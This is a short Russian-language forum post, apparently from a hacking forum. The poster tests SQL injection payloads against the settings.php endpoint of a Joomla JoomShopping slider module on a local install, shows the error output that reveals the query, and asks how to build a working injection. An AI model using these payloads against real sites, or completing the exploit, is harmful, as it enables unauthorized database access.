Либо я не до конца понимаю, либо у меня версии не сходятся.

Установил на локалку 3.4 версию движка и скачал с официального сайта этот джумлашопинг.

Вставляю так:

test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a

.SpoilerTarget" type="button">Spoiler: Открыть
Получаю сообщение:

if(typeof(jQuery) != 'undefined') {jQuery.noConflict();}window.addEvent('load',funct ion(){wflSliders['wfls209 and 1=2-- a'] = new wflSlider({"ribbon_behavior":null,"duration":500," effect_block":"single","id":"209 and 1=2-- a","orientation":"hor"})});
Вставляю вот так:

.SpoilerTarget" type="button">Spoiler: Ещё посмотреть
test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a'

Получаю:

Error displaying the error page: Application Instantiation Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''209 and 1=2-- a''' at line 3 SQL=SELECT params FROM bigmb_modules WHERE id='209 and 1=2-- a''


Получается, уязвимость присутствует и нужно лишь правильно составить запрос?

Направьте в нужное русло пожалуйста.